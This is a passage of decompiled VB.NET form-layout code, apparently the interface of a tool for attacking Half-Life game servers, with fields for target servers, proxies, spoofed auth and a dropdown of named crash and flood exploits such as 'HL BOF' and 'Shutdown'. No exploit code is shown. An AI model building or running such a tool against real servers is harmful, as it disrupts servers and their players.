  1204. Me.textBox12.BorderStyle = BorderStyle.FixedSingle
  1205. Me.textBox12.Font = New Font("Calibri", 8.25!)
  1206. Me.textBox12.ForeColor = Color.FromArgb(0, &HAC, &HC1)
  1207. Me.textBox12.Location = New Point(&H131, &HC1)
  1208. Me.textBox12.Margin = New Padding(2)
  1209. Me.textBox12.MaxLength = &H12
  1210. Me.textBox12.Name = "textBox12"
  1211. Me.textBox12.Size = New Size(&H94, &H15)
  1212. Me.textBox12.TabIndex = &H2722
  1213. Me.textBox12.Text = "100"
  1214. AddHandler Me.textBox12.KeyPress, New KeyPressEventHandler(AddressOf Me.textBox9_KeyPress)
  1215. Me.label20.AutoSize = True
  1216. Me.label20.Font = New Font("Calibri", 8.25!)
  1217. Me.label20.ForeColor = Color.FromArgb(&HBD, &HC3, &HC7)
  1218. Me.label20.Location = New Point(&HF9, &HC4)
  1219. Me.label20.Margin = New Padding(2, 0, 2, 0)
  1220. Me.label20.Name = "label20"
  1221. Me.label20.Size = New Size(&H33, 13)
  1222. Me.label20.TabIndex = &H2721
  1223. Me.label20.Text = "Timeout :"
  1224. Me.textBox11.BackColor = Color.FromArgb(&H1A, &H20, 40)
  1225. Me.textBox11.BorderStyle = BorderStyle.FixedSingle
  1226. Me.textBox11.Enabled = False
  1227. Me.textBox11.Font = New Font("Calibri", 8.25!)
  1228. Me.textBox11.ForeColor = Color.FromArgb(&HE7, &H4C, 60)
  1229. Me.textBox11.Location = New Point(&H52, &HE9)
  1230. Me.textBox11.Margin = New Padding(2)
  1231. Me.textBox11.MaxLength = &H20
  1232. Me.textBox11.Name = "textBox11"
  1233. Me.textBox11.Size = New Size(&H173, &H15)
  1234. Me.textBox11.TabIndex = &H2720
  1235. AddHandler Me.textBox11.TextChanged, New EventHandler(AddressOf Me.textBox5_TextChanged)
  1236. AddHandler Me.textBox11.KeyPress, New KeyPressEventHandler(AddressOf Me.textBox9_KeyPress)
  1237. Me.label19.AutoSize = True
  1238. Me.label19.Font = New Font("Calibri", 8.25!)
  1239. Me.label19.ForeColor = Color.FromArgb(&HBD, &HC3, &HC7)
  1240. Me.label19.Location = New Point(13, &HED)
  1241. Me.label19.Margin = New Padding(2, 0, 2, 0)
  1242. Me.label19.Name = "label19"
  1243. Me.label19.Size = New Size(&H39, 13)
  1244. Me.label19.TabIndex = &H271F
  1245. Me.label19.Text = "Local Port:"
  1246. Me.comboBox3.BackColor = Color.FromArgb(&H1A, &H20, 40)
  1247. Me.comboBox3.DropDownStyle = ComboBoxStyle.DropDownList
  1248. Me.comboBox3.FlatStyle = FlatStyle.Popup
  1249. Me.comboBox3.Font = New Font("Calibri", 8.25!, FontStyle.Bold, GraphicsUnit.Point, 0)
  1250. Me.comboBox3.ForeColor = Color.Yellow
  1251. Me.comboBox3.FormattingEnabled = True
  1252. Me.comboBox3.Items.AddRange(New Object() { "getchallenge steam", "getchallenge valve", "getchallenge" })
  1253. Me.comboBox3.Location = New Point(&H52, &HC0)
  1254. Me.comboBox3.Margin = New Padding(2)
  1255. Me.comboBox3.Name = "comboBox3"
  1256. Me.comboBox3.Size = New Size(&H9E, &H15)
  1257. Me.comboBox3.TabIndex = &H271E
  1258. Me.label17.AutoSize = True
  1259. Me.label17.Font = New Font("Calibri", 8.25!)
  1260. Me.label17.ForeColor = Color.FromArgb(&HBD, &HC3, &HC7)
  1261. Me.label17.Location = New Point(15, &HC3)
  1262. Me.label17.Margin = New Padding(2, 0, 2, 0)
  1263. Me.label17.Name = "label17"
  1264. Me.label17.Size = New Size(&H39, 13)
  1265. Me.label17.TabIndex = &H271D
  1266. Me.label17.Text = "Challenge:"
  1267. Me.label16.AutoSize = True
  1268. Me.label16.Font = New Font("Calibri", 8.25!)
  1269. Me.label16.ForeColor = Color.FromArgb(&HBD, &HC3, &HC7)
  1270. Me.label16.Location = New Point(13, &H45)
  1271. Me.label16.Margin = New Padding(2, 0, 2, 0)
  1272. Me.label16.Name = "label16"
  1273. Me.label16.Size = New Size(&H35, 13)
  1274. Me.label16.TabIndex = &H271C
  1275. Me.label16.Text = "Emulator:"
  1276. Me.comboBox2.BackColor = Color.FromArgb(&H1A, &H20, 40)
  1277. Me.comboBox2.DropDownStyle = ComboBoxStyle.DropDownList
  1278. Me.comboBox2.FlatStyle = FlatStyle.Popup
  1279. Me.comboBox2.Font = New Font("Calibri", 8.25!, FontStyle.Bold, GraphicsUnit.Point, 0)
  1280. Me.comboBox2.ForeColor = Color.Yellow
  1281. Me.comboBox2.FormattingEnabled = True
  1282. Me.comboBox2.Items.AddRange(New Object() { "RevEmu", "SteamEmu", "OldRevEmu", "AVSMP(1)", "AVSMP(0)", "SettiEmu", "Random" })
  1283. Me.comboBox2.Location = New Point(&H52, &H41)
  1284. Me.comboBox2.Margin = New Padding(2)
  1285. Me.comboBox2.Name = "comboBox2"
  1286. Me.comboBox2.Size = New Size(&H9E, &H15)
  1287. Me.comboBox2.TabIndex = &H271B
  1288. Me.comboBox2.Tag = "234"
  1289. AddHandler Me.comboBox2.SelectedIndexChanged, New EventHandler(AddressOf Me.comboBox2_SelectedIndexChanged)
  1290. Me.comboBox1.BackColor = Color.FromArgb(&H1A, &H20, 40)
  1291. Me.comboBox1.DropDownStyle = ComboBoxStyle.DropDownList
  1292. Me.comboBox1.FlatStyle = FlatStyle.Popup
  1293. Me.comboBox1.Font = New Font("Calibri", 8.25!, FontStyle.Bold, GraphicsUnit.Point, 0)
  1294. Me.comboBox1.ForeColor = Color.Yellow
  1295. Me.comboBox1.FormattingEnabled = True
  1296. Me.comboBox1.Items.AddRange(New Object() { "Dropclient", "SV_ReadClient", "Reconnect", "= Nothing =" })
  1297. Me.comboBox1.Location = New Point(&H52, &H97)
  1298. Me.comboBox1.Margin = New Padding(2)
  1299. Me.comboBox1.Name = "comboBox1"
  1300. Me.comboBox1.Size = New Size(&H9E, &H15)
  1301. Me.comboBox1.TabIndex = &H2719
  1302. AddHandler Me.comboBox1.SelectedIndexChanged, New EventHandler(AddressOf Me.comboBox1_SelectedIndexChanged)
  1303. Me.asd2.BackColor = Color.FromArgb(&H1A, &H20, 40)
  1304. Me.asd2.BorderStyle = BorderStyle.FixedSingle
  1305. Me.asd2.Font = New Font("Calibri", 8.25!)
  1306. Me.asd2.ForeColor = Color.FromArgb(0, &HAC, &HC1)
  1307. Me.asd2.Location = New Point(&H17D, 150)
  1308. Me.asd2.Margin = New Padding(2)
  1309. Me.asd2.MaxLength = &H20
  1310. Me.asd2.Name = "asd2"
  1311. Me.asd2.Size = New Size(&H48, &H15)
  1312. Me.asd2.TabIndex = &H2718
  1313. AddHandler Me.asd2.TextChanged, New EventHandler(AddressOf Me.asd2_TextChanged)
  1314. Me.label11.AutoSize = True
  1315. Me.label11.Font = New Font("Calibri", 8.25!)
  1316. Me.label11.ForeColor = Color.FromArgb(&HBD, &HC3, &HC7)
  1317. Me.label11.Location = New Point(&HFC, &H71)
  1318. Me.label11.Margin = New Padding(2, 0, 2, 0)
  1319. Me.label11.Name = "label11"
  1320. Me.label11.Size = New Size(&H2F, 13)
  1321. Me.label11.TabIndex = &H34
  1322. Me.label11.Text = "Interval:"
  1323. Me.textBox5.BackColor = Color.FromArgb(&H1A, &H20, 40)
  1324. Me.textBox5.BorderStyle = BorderStyle.FixedSingle
  1325. Me.textBox5.Font = New Font("Calibri", 8.25!, FontStyle.Regular, GraphicsUnit.Point, 0)
  1326. Me.textBox5.ForeColor = Color.FromArgb(0, &HAC, &HC1)
  1327. Me.textBox5.Location = New Point(&H12F, &H6D)
  1328. Me.textBox5.Margin = New Padding(2)
  1329. Me.textBox5.MaxLength = &H12
  1330. Me.textBox5.Name = "textBox5"
  1331. Me.textBox5.Size = New Size(&H94, &H15)
  1332. Me.textBox5.TabIndex = &H33
  1333. Me.textBox5.Text = "1000"
  1334. AddHandler Me.textBox5.KeyPress, New KeyPressEventHandler(AddressOf Me.textBox9_KeyPress)
  1335. Me.label9.AutoSize = True
  1336. Me.label9.Font = New Font("Calibri", 8.25!)
  1337. Me.label9.ForeColor = Color.FromArgb(&HBD, &HC3, &HC7)
  1338. Me.label9.Location = New Point(&HFE, &H19)
  1339. Me.label9.Margin = New Padding(2, 0, 2, 0)
  1340. Me.label9.Name = "label9"
  1341. Me.label9.Size = New Size(&H26, 13)
  1342. Me.label9.TabIndex = &H27
  1343. Me.label9.Text = "Proxy :"
  1344. Me.textBox7.BackColor = Color.FromArgb(&H1A, &H20, 40)
  1345. Me.textBox7.BorderStyle = BorderStyle.FixedSingle
  1346. Me.textBox7.Font = New Font("Calibri", 8.25!)
  1347. Me.textBox7.ForeColor = Color.FromArgb(0, &HAC, &HC1)
  1348. Me.textBox7.Location = New Point(&H131, 150)
  1349. Me.textBox7.Margin = New Padding(2)
  1350. Me.textBox7.MaxLength = 5
  1351. Me.textBox7.Name = "textBox7"
  1352. Me.textBox7.Size = New Size(&H48, &H15)
  1353. Me.textBox7.TabIndex = &H2714
  1354. Me.textBox7.Text = "_pw"
  1355. Me.label13.AutoSize = True
  1356. Me.label13.Font = New Font("Calibri", 8.25!)
  1357. Me.label13.ForeColor = Color.FromArgb(&HBD, &HC3, &HC7)
  1358. Me.label13.Location = New Point(&HFB, &H9B)
  1359. Me.label13.Margin = New Padding(2, 0, 2, 0)
  1360. Me.label13.Name = "label13"
  1361. Me.label13.Size = New Size(&H2A, 13)
  1362. Me.label13.TabIndex = &H2715
  1363. Me.label13.Text = "Setinfo:"
  1364. Me.label5.AutoSize = True
  1365. Me.label5.Font = New Font("Calibri", 8.25!)
  1366. Me.label5.ForeColor = Color.FromArgb(&HBD, &HC3, &HC7)
  1367. Me.label5.Location = New Point(&HFC, &H45)
  1368. Me.label5.Margin = New Padding(2, 0, 2, 0)
  1369. Me.label5.Name = "label5"
  1370. Me.label5.Size = New Size(&H2F, 13)
  1371. Me.label5.TabIndex = &H31
  1372. Me.label5.Text = "Packets:"
  1373. Me.textBox1.BackColor = Color.FromArgb(&H1A, &H20, 40)
  1374. Me.textBox1.BorderStyle = BorderStyle.FixedSingle
  1375. Me.textBox1.Font = New Font("Calibri", 8.25!)
  1376. Me.textBox1.ForeColor = Color.FromArgb(0, &HAC, &HC1)
  1377. Me.textBox1.Location = New Point(&H12F, &H13)
  1378. Me.textBox1.Margin = New Padding(2)
  1379. Me.textBox1.MaxLength = 14
  1380. Me.textBox1.Name = "textBox1"
  1381. Me.textBox1.Size = New Size(&H94, &H15)
  1382. Me.textBox1.TabIndex = &H26
  1383. Me.textBox1.Text = "_ip"
  1384. Me.textBox2.BackColor = Color.FromArgb(&H1A, &H20, 40)
  1385. Me.textBox2.BorderStyle = BorderStyle.FixedSingle
  1386. Me.textBox2.Font = New Font("Calibri", 8.25!)
  1387. Me.textBox2.ForeColor = Color.FromArgb(0, &HAC, &HC1)
  1388. Me.textBox2.Location = New Point(&H12F, &H41)
  1389. Me.textBox2.Margin = New Padding(2)
  1390. Me.textBox2.MaxLength = 7
  1391. Me.textBox2.Name = "textBox2"
  1392. Me.textBox2.Size = New Size(&H94, &H15)
  1393. Me.textBox2.TabIndex = &H2F
  1394. Me.textBox2.Text = "1"
  1395. AddHandler Me.textBox2.KeyPress, New KeyPressEventHandler(AddressOf Me.textBox9_KeyPress)
  1396. Me.label3.AutoSize = True
  1397. Me.label3.Font = New Font("Calibri", 8.25!)
  1398. Me.label3.ForeColor = Color.FromArgb(&HBD, &HC3, &HC7)
  1399. Me.label3.Location = New Point(13, &H9B)
  1400. Me.label3.Margin = New Padding(2, 0, 2, 0)
  1401. Me.label3.Name = "label3"
  1402. Me.label3.Size = New Size(&H3F, 13)
  1403. Me.label3.TabIndex = &H30
  1404. Me.label3.Text = "Disconnect:"
  1405. Me.Label7.AutoSize = True
  1406. Me.Label7.Font = New Font("Calibri", 8.25!)
  1407. Me.Label7.ForeColor = Color.FromArgb(&HBD, &HC3, &HC7)
  1408. Me.Label7.Location = New Point(13, &H18)
  1409. Me.Label7.Margin = New Padding(2, 0, 2, 0)
  1410. Me.Label7.Name = "Label7"
  1411. Me.Label7.Size = New Size(&H38, 13)
  1412. Me.Label7.TabIndex = &H2C
  1413. Me.Label7.Text = "Type auth:"
  1414. Me.Label6.AutoSize = True
  1415. Me.Label6.Font = New Font("Calibri", 8.25!)
  1416. Me.Label6.ForeColor = Color.FromArgb(&HBD, &HC3, &HC7)
  1417. Me.Label6.Location = New Point(11, &H70)
  1418. Me.Label6.Margin = New Padding(2, 0, 2, 0)
  1419. Me.Label6.Name = "Label6"
  1420. Me.Label6.Size = New Size(50, 13)
  1421. Me.Label6.TabIndex = &H2B
  1422. Me.Label6.Text = "Protocol:"
  1423. Me.ProtocolComboBox.BackColor = Color.FromArgb(&H1A, &H20, 40)
  1424. Me.ProtocolComboBox.DropDownStyle = ComboBoxStyle.DropDownList
  1425. Me.ProtocolComboBox.FlatStyle = FlatStyle.Popup
  1426. Me.ProtocolComboBox.Font = New Font("Calibri", 8.25!, FontStyle.Bold, GraphicsUnit.Point, 0)
  1427. Me.ProtocolComboBox.ForeColor = Color.Yellow
  1428. Me.ProtocolComboBox.FormattingEnabled = True
  1429. Me.ProtocolComboBox.Items.AddRange(New Object() { "48", "47", "46" })
  1430. Me.ProtocolComboBox.Location = New Point(&H52, &H6D)
  1431. Me.ProtocolComboBox.Margin = New Padding(2)
  1432. Me.ProtocolComboBox.Name = "ProtocolComboBox"
  1433. Me.ProtocolComboBox.Size = New Size(&H9E, &H15)
  1434. Me.ProtocolComboBox.TabIndex = &H29
  1435. AddHandler Me.ProtocolComboBox.SelectedIndexChanged, New EventHandler(AddressOf Me.ProtocolComboBox_SelectedIndexChanged)
  1436. Me.AuthtypeComboBox.BackColor = Color.FromArgb(&H1A, &H20, 40)
  1437. Me.AuthtypeComboBox.DropDownStyle = ComboBoxStyle.DropDownList
  1438. Me.AuthtypeComboBox.FlatStyle = FlatStyle.Flat
  1439. Me.AuthtypeComboBox.Font = New Font("Calibri", 8.25!, FontStyle.Bold, GraphicsUnit.Point, 0)
  1440. Me.AuthtypeComboBox.ForeColor = Color.Yellow
  1441. Me.AuthtypeComboBox.FormattingEnabled = True
  1442. Me.AuthtypeComboBox.Items.AddRange(New Object() { "Steam (P3)", "No-Steam (P2)", "No-Steam (P4)" })
  1443. Me.AuthtypeComboBox.Location = New Point(&H52, &H16)
  1444. Me.AuthtypeComboBox.Margin = New Padding(2)
  1445. Me.AuthtypeComboBox.Name = "AuthtypeComboBox"
  1446. Me.AuthtypeComboBox.Size = New Size(&H9D, &H15)
  1447. Me.AuthtypeComboBox.TabIndex = 1
  1448. AddHandler Me.AuthtypeComboBox.SelectedIndexChanged, New EventHandler(AddressOf Me.AuthtypeComboBox_SelectedIndexChanged)
  1449. Me.tabPage1.BackColor = Color.FromArgb(&H1A, &H20, 40)
  1450. Me.tabPage1.Controls.Add(Me.groupBox2)
  1451. Me.tabPage1.Location = New Point(4, &H16)
  1452. Me.tabPage1.Name = "tabPage1"
  1453. Me.tabPage1.Padding = New Padding(3)
  1454. Me.tabPage1.Size = New Size(&H1D9, &H119)
  1455. Me.tabPage1.TabIndex = 0
  1456. Me.tabPage1.Text = "Servers"
  1457. Me.groupBox2.BackColor = Color.Green
  1458. Me.groupBox2.Controls.Add(Me.textBox10)
  1459. Me.groupBox2.Controls.Add(Me.label14)
  1460. Me.groupBox2.Controls.Add(Me.Label4)
  1461. Me.groupBox2.Controls.Add(Me.HLProxyRichBox)
  1462. Me.groupBox2.Controls.Add(Me.Label8)
  1463. Me.groupBox2.Controls.Add(Me.MessageTxtBox)
  1464. Me.groupBox2.Controls.Add(Me.Label1)
  1465. Me.groupBox2.Controls.Add(Me.NicknamesRichBox)
  1466. Me.groupBox2.Controls.Add(Me.ServerListRichBox)
  1467. Me.groupBox2.Controls.Add(Me.method)
  1468. Me.groupBox2.Controls.Add(Me.label12)
  1469. Me.groupBox2.Controls.Add(Me.textBox3)
  1470. Me.groupBox2.Font = New Font("Calibri", 8.25!, FontStyle.Bold, GraphicsUnit.Point, 0)
  1471. Me.groupBox2.ForeColor = Color.FromArgb(0, &HAC, &HC1)
  1472. Me.groupBox2.Location = New Point(6, 4)
  1473. Me.groupBox2.Name = "groupBox2"
  1474. Me.groupBox2.Size = New Size(&H1CD, &H10F)
  1475. Me.groupBox2.TabIndex = &H38
  1476. Me.groupBox2.TabStop = False
  1477. Me.groupBox2.Text = "Settings"
  1478. AddHandler Me.groupBox2.Enter, New EventHandler(AddressOf Me.groupBox2_Enter)
  1479. Me.textBox10.BackColor = Color.FromArgb(&H1A, &H20, 40)
  1480. Me.textBox10.BorderStyle = BorderStyle.None
  1481. Me.textBox10.ForeColor = Color.FromArgb(&HE7, &H4C, 60)
  1482. Me.textBox10.Location = New Point(&H165, &H65)
  1483. Me.textBox10.Multiline = True
  1484. Me.textBox10.Name = "textBox10"
  1485. Me.textBox10.Size = New Size(10, 10)
  1486. Me.textBox10.TabIndex = &H2715
  1487. AddHandler Me.textBox10.TextChanged, New EventHandler(AddressOf Me.textBox10_TextChanged)
  1488. Me.label14.AutoSize = True
  1489. Me.label14.Font = New Font("Calibri", 8.25!)
  1490. Me.label14.ForeColor = Color.FromArgb(&HBD, &HC3, &HC7)
  1491. Me.label14.Location = New Point(&HEC, 15)
  1492. Me.label14.Margin = New Padding(2, 0, 2, 0)
  1493. Me.label14.Name = "label14"
  1494. Me.label14.Size = New Size(90, 13)
  1495. Me.label14.TabIndex = &H2711
  1496. Me.label14.Text = "HLProxy/HLSocks:"
  1497. Me.Label4.AutoSize = True
  1498. Me.Label4.Font = New Font("Calibri", 8.25!)
  1499. Me.Label4.ForeColor = Color.FromArgb(&HBD, &HC3, &HC7)
  1500. Me.Label4.Location = New Point(7, 15)
  1501. Me.Label4.Margin = New Padding(2, 0, 2, 0)
  1502. Me.Label4.Name = "Label4"
  1503. Me.Label4.Size = New Size(&H2D, 13)
  1504. Me.Label4.TabIndex = &H24
  1505. Me.Label4.Text = "Servers:"
  1506. Me.HLProxyRichBox.BackColor = Color.Maroon
  1507. Me.HLProxyRichBox.BorderStyle = BorderStyle.FixedSingle
  1508. Me.HLProxyRichBox.Cursor = Cursors.IBeam
  1509. Me.HLProxyRichBox.Font = New Font("Calibri", 8.25!)
  1510. Me.HLProxyRichBox.ForeColor = SystemColors.Info
  1511. Me.HLProxyRichBox.Location = New Point(&HEF, 30)
  1512. Me.HLProxyRichBox.Margin = New Padding(2)
  1513. Me.HLProxyRichBox.MaxLength = &H2710
  1514. Me.HLProxyRichBox.Multiline = True
  1515. Me.HLProxyRichBox.Name = "HLProxyRichBox"
  1516. Me.HLProxyRichBox.Size = New Size(&HD5, &H42)
  1517. Me.HLProxyRichBox.TabIndex = &H22
  1518. AddHandler Me.HLProxyRichBox.TextChanged, New EventHandler(AddressOf Me.HLProxyRichBox_TextChanged)
  1519. AddHandler Me.HLProxyRichBox.KeyPress, New KeyPressEventHandler(AddressOf Me.HLProxyRichBox_KeyPress)
  1520. Me.Label1.AutoSize = True
  1521. Me.Label1.Font = New Font("Calibri", 8.25!)
  1522. Me.Label1.ForeColor = Color.FromArgb(&HBD, &HC3, &HC7)
  1523. Me.Label1.Location = New Point(7, &H62)
  1524. Me.Label1.Margin = New Padding(2, 0, 2, 0)
  1525. Me.Label1.Name = "Label1"
  1526. Me.Label1.Size = New Size(&H26, 13)
  1527. Me.Label1.TabIndex = &H21
  1528. Me.Label1.Text = "Name:"
  1529. Me.NicknamesRichBox.BackColor = Color.Maroon
  1530. Me.NicknamesRichBox.BorderStyle = BorderStyle.FixedSingle
  1531. Me.NicknamesRichBox.Cursor = Cursors.IBeam
  1532. Me.NicknamesRichBox.Font = New Font("Calibri", 8.25!, (FontStyle.Italic Or FontStyle.Bold), GraphicsUnit.Point, 0)
  1533. Me.NicknamesRichBox.ForeColor = SystemColors.Info
  1534. Me.NicknamesRichBox.Location = New Point(10, &H70)
  1535. Me.NicknamesRichBox.Margin = New Padding(2)
  1536. Me.NicknamesRichBox.MaxLength = &H2710
  1537. Me.NicknamesRichBox.Multiline = True
  1538. Me.NicknamesRichBox.Name = "NicknamesRichBox"
  1539. Me.NicknamesRichBox.ScrollBars = ScrollBars.Horizontal
  1540. Me.NicknamesRichBox.Size = New Size(&H1BA, &H51)
  1541. Me.NicknamesRichBox.TabIndex = &H20
  1542. AddHandler Me.NicknamesRichBox.TextChanged, New EventHandler(AddressOf Me.NicknamesRichBox_TextChanged)
  1543. Me.ServerListRichBox.BackColor = Color.Maroon
  1544. Me.ServerListRichBox.BorderStyle = BorderStyle.FixedSingle
  1545. Me.ServerListRichBox.Cursor = Cursors.IBeam
  1546. Me.ServerListRichBox.Font = New Font("Calibri", 8.25!, FontStyle.Bold, GraphicsUnit.Point, 0)
  1547. Me.ServerListRichBox.ForeColor = SystemColors.Info
  1548. Me.ServerListRichBox.Location = New Point(9, 30)
  1549. Me.ServerListRichBox.Margin = New Padding(2)
  1550. Me.ServerListRichBox.MaxLength = 0
  1551. Me.ServerListRichBox.Multiline = True
  1552. Me.ServerListRichBox.Name = "ServerListRichBox"
  1553. Me.ServerListRichBox.ScrollBars = ScrollBars.Horizontal
  1554. Me.ServerListRichBox.Size = New Size(&HD5, &H41)
  1555. Me.ServerListRichBox.TabIndex = &H1F
  1556. AddHandler Me.ServerListRichBox.TextChanged, New EventHandler(AddressOf Me.ServerListRichBox_TextChanged)
  1557. AddHandler Me.ServerListRichBox.KeyPress, New KeyPressEventHandler(AddressOf Me.HLProxyRichBox_KeyPress)
  1558. Me.method.BackColor = Color.FromArgb(&H1A, &H20, 40)
  1559. Me.method.DropDownStyle = ComboBoxStyle.DropDownList
  1560. Me.method.FlatStyle = FlatStyle.Popup
  1561. Me.method.Font = New Font("Calibri", 8.25!, FontStyle.Bold, GraphicsUnit.Point, 0)
  1562. Me.method.ForeColor = Color.Yellow
  1563. Me.method.FormattingEnabled = True
  1564. Me.method.Items.AddRange(New Object() { "FileDeath 2.0", "FileDeath 1.0", "SpawnMalfunction", "HeavyResources", "FakeConnect 2.0", "Command Sennder", "KeysBugSpam", "CharacterMalfunction", "SV_ParseVoiceData", "PU HL", "Born to be pig", "SZ_GetSpace Spam", "*CstrikeDir", "SV_FullUpdate", "IndexOfEdict", "Packets Send", "SV_ParseCvarValue2", "Fuck DProto v1", "FVU xD", "Jo's v2", "Jo's win32", "KickASS-HLDS v1", "The Unknown", "Shutdown", "Bad Parse", "HL BOF", "HL Headnut", "HL Boom", "KickASS-HLDS v2", "KickASS-HLDS v3", "KickASS-HLDS v4", "SV_ParseConsistencyResponse", "WarGods Killer", "PICore", "MasterServer ClientFake", "packets_func.txt" })
  1565. Me.method.Location = New Point(&H4F, &HCF)
  1566. Me.method.Margin = New Padding(2)
  1567. Me.method.Name = "method"
  1568. Me.method.Size = New Size(&H13B, &H15)
  1569. Me.method.TabIndex = &H2F
  1570. AddHandler Me.method.SelectedIndexChanged, New EventHandler(AddressOf Me.method_SelectedIndexChanged_1)
  1571. Me.label12.AutoSize = True
  1572. Me.label12.Font = New Font("Calibri", 8.25!)
  1573. Me.label12.ForeColor = Color.FromArgb(&HBD, &HC3, &HC7)
  1574. Me.label12.Location = New Point(11, &HD3)
  1575. Me.label12.Margin = New Padding(2, 0, 2, 0)
  1576. Me.label12.Name = "label12"
  1577. Me.label12.Size = New Size(&H40, 13)
  1578. Me.label12.TabIndex = &H271A
  1579. Me.label12.Text = "Exploit hlds:"
  1580. Me.textBox3.BackColor = Color.FromArgb(&H1A, &H20, 40)
  1581. Me.textBox3.BorderStyle = BorderStyle.FixedSingle
  1582. Me.textBox3.Enabled = False
  1583. Me.textBox3.Font = New Font("Calibri", 8.25!, FontStyle.Bold, GraphicsUnit.Point, 0)
  1584. Me.textBox3.ForeColor = Color.FromArgb(&HBD, &HC3, &HC7)
  1585. Me.textBox3.Location = New Point(&H18E, &HCF)
  1586. Me.textBox3.Margin = New Padding(2)
  1587. Me.textBox3.MaxLength = 4
  1588. Me.textBox3.Multiline = True
  1589. Me.textBox3.Name = "textBox3"
  1590. Me.textBox3.Size = New Size(&H36, &H15)
  1591. Me.textBox3.TabIndex = 50
  1592. Me.textBox3.Text = "1"
  1593. AddHandler Me.textBox3.KeyPress, New KeyPressEventHandler(AddressOf Me.textBox9_KeyPress)
  1594. Me.tabControl1.Controls.Add(Me.tabPage1)
  1595. Me.tabControl1.Controls.Add(Me.tabPage2)
  1596. Me.tabControl1.Controls.Add(Me.tabPage3)
  1597. Me.tabControl1.Controls.Add(Me.tabPage4)
  1598. Me.tabControl1.Controls.Add(Me.tabPage5)
  1599. Me.tabControl1.Location = New Point(6, &H1D)
  1600. Me.tabControl1.Name = "tabControl1"
  1601. Me.tabControl1.SelectedIndex = 0
  1602. Me.tabControl1.Size = New Size(&H1E1, &H133)
  1603. Me.tabControl1.TabIndex = &H2724
  1604. Me.tabPage3.BackColor = Color.FromArgb(&H1A, &H20, 40)
  1605. Me.tabPage3.Controls.Add(Me.groupBox1)
  1606. Me.tabPage3.Location = New Point(4, &H16)
  1607. Me.tabPage3.Name = "tabPage3"
  1608. Me.tabPage3.Padding = New Padding(3)
  1609. Me.tabPage3.Size = New Size(&H1D9, &H119)
  1610. Me.tabPage3.TabIndex = 2
  1611. Me.tabPage3.Text = "Authentication"
  1612. Me.tabPage4.BackColor = Color.FromArgb(&H1A, &H20, 40)
  1613. Me.tabPage4.Controls.Add(Me.label21)
  1614. Me.tabPage4.Controls.Add(Me.label18)
  1615. Me.tabPage4.Controls.Add(Me.button8)
  1616. Me.tabPage4.Controls.Add(Me.textBox14)
  1617. Me.tabPage4.Controls.Add(Me.textBox13)
  1618. Me.tabPage4.Location = New Point(4, &H16)
  1619. Me.tabPage4.Name = "tabPage4"
  1620. Me.tabPage4.Padding = New Padding(3)
  1621. Me.tabPage4.Size = New Size(&H1D9, &H119)
  1622. Me.tabPage4.TabIndex = 3
  1623. Me.tabPage4.Text = "Resolver DNS"
  1624. Me.label21.AutoSize = True
  1625. Me.label21.Font = New Font("Calibri", 8.25!, FontStyle.Bold, GraphicsUnit.Point, 0)
  1626. Me.label21.ForeColor = Color.FromArgb(0, &HAC, &HC1)
  1627. Me.label21.Location = New Point(&HD0, 5)
  1628. Me.label21.Margin = New Padding(2, 0, 2, 0)
  1629. Me.label21.Name = "label21"
  1630. Me.label21.Size = New Size(&H2F, 13)
  1631. Me.label21.TabIndex = &H2729
  1632. Me.label21.Text = "Address:"
  1633. Me.label18.AutoSize = True
  1634. Me.label18.Font = New Font("Calibri", 8.25!, FontStyle.Bold, GraphicsUnit.Point, 0)
  1635. Me.label18.ForeColor = Color.FromArgb(0, &HAC, &HC1)
  1636. Me.label18.Location = New Point(5, 5)
  1637. Me.label18.Margin = New Padding(2, 0, 2, 0)
  1638. Me.label18.Name = "label18"
  1639. Me.label18.Size = New Size(&H1D, 13)
  1640. Me.label18.TabIndex = &H2728
  1641. Me.label18.Text = "DNS:"
  1642. Me.button8.FlatStyle = FlatStyle.Flat
  1643. Me.button8.ForeColor = Color.FromArgb(0, &HAC, &HC1)
  1644. Me.button8.Location = New Point(8, &HF8)
  1645. Me.button8.Name = "button8"
  1646. Me.button8.Size = New Size(460, &H1B)
  1647. Me.button8.TabIndex = &H2727
  1648. Me.button8.Text = "Resolve DNS"
  1649. Me.button8.UseVisualStyleBackColor = True
  1650. AddHandler Me.button8.Click, New EventHandler(AddressOf Me.button8_Click)
  1651. Me.textBox14.BackColor = Color.FromArgb(&H1A, &H20, 40)
  1652. Me.textBox14.BorderStyle = BorderStyle.FixedSingle
  1653. Me.textBox14.Cursor = Cursors.IBeam
  1654. Me.textBox14.Font = New Font("Calibri", 8.25!)
  1655. Me.textBox14.ForeColor = Color.Lime
  1656. Me.textBox14.Location = New Point(210, &H16)
  1657. Me.textBox14.Margin = New Padding(2)
  1658. Me.textBox14.MaxLength = 0
  1659. Me.textBox14.Multiline = True
  1660. Me.textBox14.Name = "textBox14"
  1661. Me.textBox14.ReadOnly = True
  1662. Me.textBox14.Size = New Size(&H102, &HDD)
  1663. Me.textBox14.TabIndex = &H2726
  1664. Me.textBox13.BackColor = Color.FromArgb(&H1A, &H20, 40)
  1665. Me.textBox13.BorderStyle = BorderStyle.FixedSingle
  1666. Me.textBox13.Cursor = Cursors.IBeam
  1667. Me.textBox13.Font = New Font("Calibri", 8.25!)
  1668. Me.textBox13.ForeColor = Color.FromArgb(&HF1, &HC4, 15)
  1669. Me.textBox13.Location = New Point(8, &H16)
  1670. Me.textBox13.Margin = New Padding(2)
  1671. Me.textBox13.MaxLength = 0
  1672. Me.textBox13.Multiline = True
  1673. Me.textBox13.Name = "textBox13"
  1674. Me.textBox13.Size = New Size(&HC3, &HDD)
  1675. Me.textBox13.TabIndex = &H2725
  1676. Me.tabPage5.BackColor = Color.FromArgb(&H1A, &H20, 40)
  1677. Me.tabPage5.Controls.Add(Me.groupBox5)
  1678. Me.tabPage5.Location = New Point(4, &H16)
  1679. Me.tabPage5.Name = "tabPage5"
  1680. Me.tabPage5.Padding = New Padding(3)
  1681. Me.tabPage5.Size = New Size(&H1D9, &H119)
  1682. Me.tabPage5.TabIndex = 4
  1683. Me.tabPage5.Text = "Console"
  1684. Me.AutoValidate = AutoValidate.EnablePreventFocusChange
  1685. Me.BackColor = Color.FromArgb(&H80, &HFF, &HFF)
  1686. MyBase.ClientSize = New Size(&H1EE, &H1A8)
  1687. MyBase.Controls.Add(Me.tabControl1)
  1688. MyBase.Controls.Add(Me.button7)
  1689. MyBase.Controls.Add(Me.button6)
  1690. MyBase.Controls.Add(Me.Button1)
  1691. MyBase.Controls.Add(Me.button2)
  1692. Me.Font = New Font("Calibri", 8.25!, FontStyle.Regular, GraphicsUnit.Point, 0)
